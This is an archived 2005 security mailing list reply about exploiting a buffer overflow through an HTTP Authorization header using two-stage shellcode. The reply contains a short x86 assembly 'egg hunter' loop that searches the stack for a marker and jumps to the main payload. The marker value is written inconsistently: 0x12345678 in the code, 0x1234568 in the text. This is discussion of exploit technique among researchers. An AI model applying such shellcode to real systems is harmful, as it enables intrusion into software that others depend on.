Vulnerability Development mailing list archives

Re: Exploitation Help

From: Felix Lindner <felix.lindner () nruns com>
Date: Wed, 18 May 2005 10:20:39 +0200

On 17 May 2005 09:20:51 -0000
<ramatkal () hotmail com> wrote:


So, I am basically thinking, i overflow EIP with an address that JMP's -260
to the beginning of the Authorization header. The Authorization header then
contains my Stage1 shellcode that starts searching down the stack for my
Stage2 shellcode which it will find about 2k down the stack in the GET
request.....

I hope somebody understands what the hell i am talking about....


You could easily implement a small code in the 250 byte buffer doing the
following:

        mov esi,esp
Loop:
        inc esi
        cmp [esi],0x12345678
        je found
        jmp short Loop
found:
        add esi,4
        jmp esi

and begin your "real" shellcode with 0x1234568 or any other pattern for that
matter. 

cheers
Felix

-- 
 Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH
         fx () nruns com | +49 (0)171 740 20 62
A hacker does for love what others would not do for money.

Current thread:

Exploitation Help ramatkal (May 17)
- Re: Exploitation Help James Longstreet (May 18)
- Re: Exploitation Help Felix Lindner (May 18)